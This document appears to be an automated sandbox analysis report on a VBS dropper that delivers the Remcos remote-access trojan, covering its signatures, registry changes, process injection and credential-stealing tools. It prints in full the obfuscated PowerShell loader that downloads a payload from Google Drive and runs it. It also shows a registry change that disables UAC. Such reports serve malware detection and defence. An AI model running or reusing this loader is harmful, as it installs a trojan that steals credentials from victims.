Malware Analysis Report

2025-04-03 14:14

Sample ID 241105-ejch8atkbz
Target 92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs
SHA256 92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523
Tags
discovery remcos remotehost collection credential_access evasion rat stealer trojan
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523

Threat Level: Known bad

The file 92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs was found to be: Known bad.

Malicious Activity Summary

discovery remcos remotehost collection credential_access evasion rat stealer trojan

Remcos

UAC bypass

Remcos family

Detected Nirsoft tools

NirSoft MailPassView

NirSoft WebBrowserPassView

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Network Service Discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Modifies registry class

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-05 03:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-05 03:57

Reported

2024-11-05 04:00

Platform

win7-20241010-en

Max time kernel

150s

Max time network

128s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A

Network Service Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Jone Semicurvilinear Plimraadden Storywriter #>;$Udlndinge='Ancien';<#Sndag Snydertampens Formulation Forkamres Unrivet Fuldbyrdet #>; function Immenser($Accoucheurers135){If ($host.DebuggerEnabled) {$granerne++;}$kegful=$Systemgruppers+$Accoucheurers135.'Length' - $granerne; for ( $Tyveaarsdagene=4;$Tyveaarsdagene -lt $kegful;$Tyveaarsdagene+=5){$Tostrenget=$Tyveaarsdagene;$Trehager+=$Accoucheurers135[$Tyveaarsdagene];}$Trehager;}function Aegicrania($Skjulesteds){ . ($Indkomstpligtiges) ($Skjulesteds);}$Spiritualty247=Immenser 'OutpM Raso raszMariiIndel,opslDikoaAlbe/Ma i ';$diaschisma=Immenser 'FortT I llEnedsCons1.nre2 rud ';$Unisexuality=' Cog[eyeoNFy.dEMedvTalve.ReflS ileeSingRDesiV eroiChokcKjesEbo lp,dstOAkkoIS aanglobTIn smBuruaSejpnFaitAZip GStheEsandr Wes]Unde:Anky:RadeSKollEIncacSrgeUBegyrSya iUdluTSandYHaknP W eRWiltOCro TDoctoRetsCAnimOR.stlCliv= Wed$kn bdUnbrIDagvATheos uksCDefiHTuskipraeS S,im GraA eng ';$Spiritualty247+=Immenser ' Le 5Pala. Cul0Sp,c Anop(RetrWEriniDue nBu ud AfdoRehaw KatsPers LkkeN ColTElek Demu1 Dor0Fors.Ribb0Havm;.eac OrnaWSlidiAbbrnKloi6 rea4Skye;Thre Progx Hyd6 Imp4Retn;Bigg asr un vVolk:Shel1V,so3nonb1Rnke.Stet0Fo,e)Diab CoulGOmfae OkocSkulkankeoCro./Kapi2Konk0Fem 1Udra0B gh0 C e1 T.l0Immu1B li VoicFWandiAgrersplae,urufTopeoA.tox Ci,/ oh1Plat3 Lik1 T l.Ty,a0Nor ';$Micropaleontologist=Immenser 'AlfoUIndlsNatuESoluRO ga-EfteASfaeGCos EO eaN,shaTmisp ';$pharyngology=Immenser 'Te ehLegatS amtTeaspWhissArch:Lakr/klar/Ad.ldLeverU.foiDri,vVg keSpid. turgFreao looDebigPhthl DipeKany.DraccHosto igmFjor/SaleuGe.fcHovn? 
ConeWassx ,etpWarroDe,drPrett eo=Heatdmne,ooff wD ganDentltrieo EclaAnchdPlat&BaluiIchtdPors=akad1 M ntBr lI renvDia rHarpdOxyhXRecuTSe oV C pB.ids8OppoiOnyc-SkabCBenokKerna Sacy MadZBioskLag OBog,RRep,LWhig4Uds BParaXFingdBe kF RepVPseueLol hCan 6 FilEKubiOSpar ';$Afstikkerens=Immenser 'Bygg>Pold ';$Indkomstpligtiges=Immenser 'H,loiJonbEBogsx kat ';$Rollings='Forbryderes';$Fornjelsesrejse='\Avlshingstes2.Xyl';Aegicrania (Immenser 'Asga$ CipgFngsl.pvuOMy tb llAOutml Ska:IvitNFu.dareveGValagFaciiLgesN unoGAn slsikkyC ns=Derm$R.prECoveN Apiv.ord:wittA pedpa uaPtar.d psAVaerTKe,eAS un+Sce.$LacefLipoO esiR Mi n,ataJchapEafl.L Br smineeSlikS KlirAdreeAnatjTablsT,roe A.e ');Aegicrania (Immenser ',amf$Co,kG SubL Foro herBOpiuANrmeLRege: litFBedeON nar DemURingD VogRFruge SfafL,nde nkRAfbreDatiNSudacAne.eTraasOdge2K,ns3Fl r5Fab = nor$ CenPUovehHexaATe,rRSurnyRo tn BetgRe no ralReliobackG,ubly In,. Neds,terpPlatL LusIHottTHigh(Rach$ M raVirkfPin s St TComeIDikokKan KMythEslanrSgereImmoN ortsedei)Intr ');Aegicrania (Immenser $Unisexuality);$pharyngology=$Forudreferences235[0];$Aphanozygous=(Immenser ' Adi$UnevGR.velFortO ,hib BorADeliL Edw: GenCLeksyCa dcSminLSan o NedN VasITresCAile=MadsNPseuETuguwG,ne-e vro.errB klujLacteTop CPol,T Bio SkrasTerrYRoqusforetMoo eSultMSeru.ThyrNAirmESpyfTMe t. 
PseW PopESmmeBSemiCMntrlAcheIfo tE Ma n jerTEksk ');Aegicrania ($Aphanozygous);Aegicrania (Immenser 'Axio$ForeCEncyy Ov.cOpl.luncaosedunIndtiBea.cWean.PodoH .bleBla a Sprd LeveSu er Kl sHete[Ethn$ Dy MCidaiFo kcflder SkvoEa epGe eaGi,al ame SysoKrftn BehtSkrpoYve,lHandoHypegSortiCalisTravtHof ]Sus =Ulde$stemSBejepU stiDallrAngiiPro tInteuFor aColll ettMandy Me.2busl4Thic7Noti ');$Nondeflationary=Immenser ' Epo$VariCPtilySparc l dlLeddoMoton UdliDramcCull.FarlD T ao En,w AcenN sol veroM noaDag,d BesFEmboiSultlBereeOrd,(Kjes$Und.p SprhSulta bjer eiychoknWe ngU.foost rl DewoUdsugWooly.ove,Dyre$ CymRCly.eWessg G naH lltexemtDiskaPaddeHousrEn.esUnde)Dagb ';$Regattaers=$naggingly;Aegicrania (Immenser 'Tra $Xen GGrafl UlvOT anb penaAi wLSino:HattM alaAA,toZErotURhinRThlaK .weAakts= O e(smaktha vEUnd sRearT.ure-FlotpSeriALu.stTankhC vi Toki$UglerbarbEGascg quia Ca,tFrolTSynsaSkafe BalRTranSSpri)Kv l ');while (!$mazurka) {Aegicrania (Immenser ' po$non gPhotlAltao CatbNonsaJil,lTung: BitBTubauLntirJanilVeroeTi stHigh=Outw$ Dimt .unrMariufasteYd.r ') ;Aegicrania $Nondeflationary;Aegicrania (Immenser 'TjrnSParatPan aAestrT.nstTele-B,nkSPy.eL Bl eBry EPiloPCon Fu v4Gip ');Aegicrania (Immenser 'P,an$Os egUrk.l ecaOT adBAr haVirkLJagt:Gi bmpaanABarnzMariuTermRAlonkAgamA Car=C os(EjerTYamseD lmsunnoTSub.-u.baPBrd AStu,TBogoHidrt tyk$LgterOutne NonG MegADisstRaditIndkA HaaE .apRNoncs Cam)Blok ') ;Aegicrania (Immenser 'U vu$ EksgCrepLJussOBetaB t eaBehaLHy l: losSRotukafplrFor u enceBudctYverSFrar=Poss$ ChuGAlarLBanaOUtilBDataAPa.tLCajs:Bi laCompN SigtOverIJ coPBlokY MatostyrNL veITraiNLich+hums+Tier%Pyro$MatsFVagaOU.dnRSin u HalDMalarDo sEHiblFOvere.isfRCha,eSta NKosoC Kr.eTrirs .ve2Prop3 Fll5Runr. 
Cucc SwaoMerruDoglNNaziTKorr ') ;$pharyngology=$Forudreferences235[$skruets];}$Fortidige=289428;$Tacamahac=30629;Aegicrania (Immenser 'Rusl$Tee,GInd LOmstOPhosbMeleA pdL.ele:Antit pipRPro YSifaKomskKPh nE TartGuldECoy k A rNNit,i PrekBenzSSkil Burl=Su e Ru,GOverEButtT Phy-MyolC T koStavnBr,mtSupeEAsepnbrndTLelw Pneo$InsiRFasee Argg,nkoa Ov,T.isatBagtaNonceraasRHedgsNeg, ');Aegicrania (Immenser ' N,n$ EftgNonll banoKultb ,fsa achlPena:St aIFrees Rego .edcParar Ke ySan mV rieOver Russ= mo Roth[TaclS,ndbyAigls ydrt.alue DenmMy,o.ret CC gaoUnc,nVomivBhlae,bbrrstr tK,al] Aet:Kred:ForsFTilfr Subo icmW ldB Unda,ulpsBru.eSk.r6,rys4SensSSimrtWarsrMenniFedtnT pngLa.i(Gods$Syn.TM,strHumayMicokLi,nkRegne.owat Rege petkDrifnMythi,inakOutcs Co.)Imit ');Aegicrania (Immenser ' fem$Opdrg ,anl OakoRielbMotoAUd.olServ: b pRanb E RodCSediIS rirBrinKAfsku hytlBumkEBusaRRestiA tiNMargg DucESlb,rSquaNEboneLuttsr ce K n= Dr Hor[UnarS kanYDel s lertCor E DevmS,if.Torgt NoneKarixSa ktU,de. SoreMis,nClocc ekoPiped OboIDro nKittGCur ],kva:Subs: OpsATrflSDerecMateiTridIFo s.DigegFrdsE E hTg ngS M ntDeltraccoimuhaN.ectgUdkl( Gen$SymbISyres ilkOVel,CCyt RLy tYMo rMVolaeE cl)N ur ');Aegicrania (Immenser 'Hj,e$AverGS inl Ha.OForfBProda DisLOvid: UpsjU,ocu MasMFlorb OrnUAt acsaboK ela=Bere$Od.rRDukkE pheCeksaiSamlrHadbkSkufuNedrl .aueSilkRNonmiM hanPrecgUnwwe KulrVrdiNStukE ReaSS.pe.StamsBa nuuncabRelesSmittEndorSt kiBenzNMesoGSt r(Dis $TystfAdr oAncyR CerTTy,nIVeleDUnboiSaragMedaeBene,Hie $ NavTCe ea R pc hibAB,limMedlaRigshTo aABrudCK.lb) el ');Aegicrania $Jumbuck;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab4A99.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2736-20-0x000007FEF626E000-0x000007FEF626F000-memory.dmp

memory/2736-21-0x000000001B2C0000-0x000000001B5A2000-memory.dmp

memory/2736-22-0x0000000002510000-0x0000000002518000-memory.dmp

memory/2736-23-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-24-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-25-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-26-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-27-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-28-0x000007FEF626E000-0x000007FEF626F000-memory.dmp

memory/2736-29-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-30-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-31-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

memory/2736-32-0x000007FEF5FB0000-0x000007FEF694D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-05 03:57

Reported

2024-11-05 04:00

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92dbf37835455cd68d10e5cf6f750ec2d72de8ec7b8d92ffb751f7ceb8653523.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A

Detected Nirsoft tools

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

NirSoft MailPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

NirSoft WebBrowserPassView

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Accesses Microsoft Outlook accounts

collection
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Network Service Discovery

discovery
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 3376 set thread context of 4612 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3376 set thread context of 1040 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3376 set thread context of 872 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4456 wrote to memory of 4904 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4456 wrote to memory of 4904 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3960 wrote to memory of 3376 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3960 wrote to memory of 3376 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3960 wrote to memory of 3376 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3960 wrote to memory of 3376 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe
PID 3376 wrote to memory of 3436 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 3436 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 3376 wrote to memory of 3436 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\cmd.exe
PID 3436 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3436 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3436 wrote to memory of 2540 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 3376 wrote to memory of 4916 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3376 wrote to memory of 4916 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 5104 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 5104 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 4916 wrote to memory of 2416 | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | C:\Program Files\Google\Chrome\Application\Chrome.exe
